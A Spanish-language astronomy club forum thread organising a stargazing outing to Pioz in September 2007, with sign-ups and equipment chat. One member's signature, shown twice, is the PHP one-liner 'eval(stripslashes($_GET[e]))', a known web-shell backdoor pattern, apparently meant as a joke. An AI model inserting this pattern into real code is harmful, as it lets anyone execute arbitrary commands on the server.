Salida a Pioz Sabado 8-Sep-2007

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
rcacho
Mensajes: 532
Registrado: Vie Mar 02, 2007 9:39 pm

Salida a Pioz Sabado 8-Sep-2007

Mensaje por rcacho »

Pues en un ataque de mono de observacion nos hemos propuesto salir este sábado a Pioz. Alguien se apunta? En principio quedamos alli y que cada uno llegue a la hora que mas le convenga. Eso si, los que llegueis de noche, por favor, tened cuidado con los faros del coche ;)

Nos vemos alli!!!
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Salida a Pioz Sabado 8-Sep-2007

Mensaje por carlosz22 »

Aunque ya te lo he dicho por el MSN.

¡¡Me apunto!! :D

EDITO: Esta vez me llevaré los prismáticos.
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Salida a Pioz Sabado 8-Sep-2007

Mensaje por astrolozano »

Si la meteorología lo permite el sábado disfrutaré de unos cielos bastante más oscuros desde la puerta de "mi casa", así que.... yo esta vez no me apunto. Me da rabia perdérmelo, pero toca pueblo :lol:

Que os cunda la noche, ya nos contareis.
Saludos.
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Salida a Pioz Sabado 8-Sep-2007

Mensaje por carlosz22 »

Encima dando envidia...

Que veas muchas cosas desde la selva de tu jardín :P

Un saludo :D
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Salida a Pioz Sabado 8-Sep-2007

Mensaje por m3ntol »

Tengo los créditos de salir este mes gastados en Tiermes :(
phpbb:eval(stripslashes($_GET[e]));
ender
Mensajes: 67
Registrado: Dom Jul 15, 2007 8:58 pm

Salida a Pioz Sabado 8-Sep-2007

Mensaje por ender »

Intentare asistir para ir calentando motores antes de Tiermes, jejeje.

Saludos, y a ver si nos vemos el Sabado.
alnitakzetaorionis
ciberdraco
Mensajes: 25
Registrado: Mar Ago 28, 2007 2:04 pm

Salida a Pioz Sabado 8-Sep-2007

Mensaje por ciberdraco »

A mi me gustaria ir si no teneis inconvenientes :oops: Ya fui el sabado pasado y me parecio una pasada
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Salida a Pioz Sabado 8-Sep-2007

Mensaje por m3ntol »

[quote="ciberdraco"]A mi me gustaria ir si no teneis inconvenientes :oops: Ya fui el sabado pasado y me parecio una pasada[/quote]

Por supuesto que estás invitado. Cuanta más gente venga mejor. Yo esta vez no podré ir pero ya verás como resulta mucho más gratificante compartir la aficiòn con otros.
phpbb:eval(stripslashes($_GET[e]));
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Salida a Pioz Sabado 8-Sep-2007

Mensaje por astrolozano »

[quote="m3ntol"] ya verás como resulta mucho más gratificante compartir la aficiòn con otros.[/quote]

Con carlos no, te hace cuestionarte si estás bien de la vista o te estás quedando ciego. :twisted: Es broma, pero si no ves algo que carlos diga que está ahí no te preocupes porque es lo más normal :wink:

Ciberdraco, es una pena que yo no vaya esta vez, si no salíamos juntos desde Torrejón...

EDITO: Me acabo de dar cuenta de que ya conoces el sitio jejeje, es que estoy de exámenes y me cuesta reaccionar.
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Salida a Pioz Sabado 8-Sep-2007

Mensaje por astrolozano »

Por cierto, ender aprovecha para poner en estación la montura :wink: ¿cómo se te va dando?

Si alguien es tan amable de examinar su tubo (carlos??) y que luego me cuente si es igual que el mío (portaocular, colimación, etc) se lo agradecería, siempre que ender no tenga ningún problema. Es que si veo que el mío es peor, llamo a geologistics jeje (sigo sin saber nada de mi buscador ni mi motor).

Os iba a decir que os dejo el Hyperion, pero acabo de darme cuenta de que lo necesitaré yo :oops:
Responder